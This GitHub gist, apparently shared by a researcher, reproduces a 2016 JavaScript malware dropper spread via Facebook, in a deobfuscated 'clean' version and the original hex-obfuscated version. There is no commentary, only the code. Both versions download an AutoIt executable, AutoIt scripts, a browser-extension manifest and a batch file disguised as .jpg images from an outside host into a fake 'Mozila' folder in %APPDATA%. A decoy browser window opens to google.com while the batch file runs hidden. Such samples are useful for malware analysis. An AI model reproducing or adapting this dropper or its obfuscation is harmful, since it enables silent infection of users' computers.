Skip to content

Instantly share code, notes, and snippets.

@ITAYC0HEN

ITAYC0HEN/cleanVersion.js

Created June 29, 2016 10:50
Show Gist options
  • Save ITAYC0HEN/9cd6f3b733d6de6048fa2d3047d0e5ab to your computer and use it in GitHub Desktop.
Save ITAYC0HEN/9cd6f3b733d6de6048fa2d3047d0e5ab to your computer and use it in GitHub Desktop.
Download ZIP
Facebook Malware (1st JS file) - June 2016
Raw
cleanVersion.js
(function(p)
{
function downloader(url,dest,position)
{
if(!dest || !url)
{return null};
var _httpHandler=WScript.CreateObject("Msxml2.XMLhttp");
_httpHandler.onreadystatechange= function()
{
if(_httpHandler.readyState=== 4&& _httpHandler.status=== 200)
{
stream1= new ActiveXObject("ADODB.Stream");
stream1.open();
stream1.type= 1;
stream1.write(_httpHandler.ResponseBody);
stream1.position = position;
stream2= new ActiveXObject("ADODB.Stream");
stream2.type= 1;
stream2.open();
stream2.write(stream1.read());
stream2.saveToFile(dest,2);
stream2.close();
stream1.close()
}
};
_httpHandler.open("GET",url,false);
_httpHandler.send(null)
}
fileSystemObject= new ActiveXObject("Scripting.FileSystemObject");
var environment= new ActiveXObject("WScript.Shell");
shell= new ActiveXObject("Shell.Application");
FileDestination= environment["ExpandEnvironmentStrings"]("%APPDATA%\\");
MozillaLocation= FileDestination+ "Mozila";
if(!fileSystemObject.FolderExists(MozillaLocation))
{
fileSystemObject.CreateFolder(MozillaLocation);
}
shell.ShellExecute("https://www.google.com");
downloader("http://userexperiencestatics.net/ext/Autoit.jpg",MozillaLocation+ "\autoit.exe",0);
downloader("http://userexperiencestatics.net/ext/bg.jpg",MozillaLocation+ "\bg.js",0);
downloader("http://userexperiencestatics.net/ext/ekl.jpg",MozillaLocation+ "\ekl.au3",0);
downloader("http://userexperiencestatics.net/ext/ff.jpg",MozillaLocation+ "\ff.zip",0);
downloader("http://userexperiencestatics.net/ext/force.jpg",MozillaLocation+ "\force.au3",0);
downloader("http://userexperiencestatics.net/ext/sabit.jpg",MozillaLocation+ "\sabit.au3",0);
downloader("http://userexperiencestatics.net/ext/manifest.jpg",MozillaLocation+ "\manifest.json",0);
downloader("http://userexperiencestatics.net/ext/run.jpg",MozillaLocation+ "\run.bat",0);
downloader("http://userexperiencestatics.net/ext/up.jpg",MozillaLocation+ "\up.au3",0);
downloader("http://whos.amung.us/pingjs/?k=pingjse346",MozillaLocation+ "\ping.js",0);
downloader("http://whos.amung.us/pingjs/?k=pingjse3462",MozillaLocation+ "\ping2.js",0);
shell.ShellExecute(MozillaLocation+ "\run.bat","",MozillaLocation,"",0)
})(this);
Raw
obfuscatedVersion.js
var _0xe519=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x68\x74\x74\x70","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D","\x6F\x70\x65\x6E","\x74\x79\x70\x65","\x77\x72\x69\x74\x65","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x72\x65\x61\x64","\x73\x61\x76\x65\x54\x6F\x46\x69\x6C\x65","\x63\x6C\x6F\x73\x65","\x47\x45\x54","\x73\x65\x6E\x64","\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74","\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C","\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","\x25\x41\x50\x50\x44\x41\x54\x41\x25\x5C","\x45\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73","\x4D\x6F\x7A\x69\x6C\x61","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x41\x75\x74\x6F\x69\x74\x2E\x6A\x70\x67","\x5C\x61\x75\x74\x6F\x69\x74\x2E\x65\x78\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x62\x67\x2E\x6A\x70\x67","\x5C\x62\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x65\x6B\x6C\x2E\x6A\x70\x67","\x5C\x65\x6B\x6C\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x66\x2E\x6A\x70\x67","\x5C\x66\x66\x2E\x7A\x69\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x6F\x72\x63\x65\x2E\x6A\x70\x67","\x5C\x66\x6F\x72\x63\x65\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x73\x61\x62\x69\x74\x2E\x6A\x70\x67","\x5C\x73\x61\x62\x69\x74\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x70\x67","\x5C\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x72\x75\x6E\x2E\x6A\x70\x67","\x5C\x72\x75\x6E\x2E\x62\x61\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x75\x70\x2E\x6A\x70\x67","\x5C\x75\x70\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36","\x5C\x70\x69\x6E\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36\x32","\x5C\x70\x69\x6E\x67\x32\x2E\x6A\x73",""];(function(_0xc4a4x1){function _0xc4a4x2(_0xc4a4x2,_0xc4a4x3,_0xc4a4x4){if(!_0xc4a4x3|| !_0xc4a4x2){return null};var _0xc4a4x5=WScript.CreateObject(_0xe519[0]);_0xc4a4x5[_0xe519[1]]= function(){if(_0xc4a4x5[_0xe519[2]]=== 4&& _0xc4a4x5[_0xe519[3]]=== 200){xa= new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa[_0xe519[7]](_0xc4a4x5.ResponseBody);xa[_0xe519[8]]= _0xc4a4x4;stm2= new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](xa[_0xe519[9]]());stm2[_0xe519[10]](_0xc4a4x3,2);stm2[_0xe519[11]]();xa[_0xe519[11]]()}};_0xc4a4x5[_0xe519[5]](_0xe519[12],_0xc4a4x2,false);_0xc4a4x5[_0xe519[13]](null)}function _0xc4a4x6(_0xc4a4x7,_0xc4a4x8){{xa= new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa.LoadFromFile(_0xc4a4x7);ix= new ActiveXObject(_0xe519[4]);ix[_0xe519[5]]();ix[_0xe519[6]]= 1;ix.LoadFromFile(_0xc4a4x8);stm2= new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](ix[_0xe519[9]]());stm2[_0xe519[7]](xa[_0xe519[9]]());xa[_0xe519[11]]();ix[_0xe519[11]]();stm2[_0xe519[10]](_0xc4a4x7,2);stm2[_0xe519[11]]()}}fso= new ActiveXObject(_0xe519[14]);var _0xc4a4x9= new ActiveXObject(_0xe519[15]);_0xc4a4x1= new ActiveXObject(_0xe519[16]);FileDestr= _0xc4a4x9[_0xe519[18]](_0xe519[17]);mozklasor= FileDestr+ _0xe519[19];if(!fso.FolderExists(mozklasor)){fso.CreateFolder(mozklasor)};_0xc4a4x1.ShellExecute(_0xe519[20]);_0xc4a4x2(_0xe519[21],mozklasor+ _0xe519[22],0);_0xc4a4x2(_0xe519[23],mozklasor+ _0xe519[24],0);_0xc4a4x2(_0xe519[25],mozklasor+ _0xe519[26],0);_0xc4a4x2(_0xe519[27],mozklasor+ _0xe519[28],0);_0xc4a4x2(_0xe519[29],mozklasor+ _0xe519[30],0);_0xc4a4x2(_0xe519[31],mozklasor+ _0xe519[32],0);_0xc4a4x2(_0xe519[33],mozklasor+ _0xe519[34],0);_0xc4a4x2(_0xe519[35],mozklasor+ _0xe519[36],0);_0xc4a4x2(_0xe519[37],mozklasor+ _0xe519[38],0);_0xc4a4x2(_0xe519[39],mozklasor+ _0xe519[40],0);_0xc4a4x2(_0xe519[41],mozklasor+ _0xe519[42],0);_0xc4a4x1.ShellExecute(mozklasor+ _0xe519[36],_0xe519[43],mozklasor,_0xe519[43],0)})(this)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment